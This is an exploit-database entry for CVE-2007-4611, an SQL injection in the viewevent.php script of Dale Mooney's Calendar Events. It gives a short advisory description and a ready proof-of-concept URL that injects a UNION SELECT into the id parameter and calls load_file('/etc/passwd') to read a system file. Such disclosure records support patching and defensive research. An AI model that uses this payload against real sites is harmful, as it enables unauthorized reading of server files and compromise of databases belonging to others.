Dale Mooney Calendar Events - 'Viewevent.php' SQL Injection



EKU-ID: 35569 CVE: CVE-2007-4611;OSVDB-38438 OSVDB-ID:
Author: s0cratex Published: 2007-08-27 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/25456/info

Calendar Events is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/viewevent.php?id=-1' union select 1,load_file('/etc/passwd'),1,1/*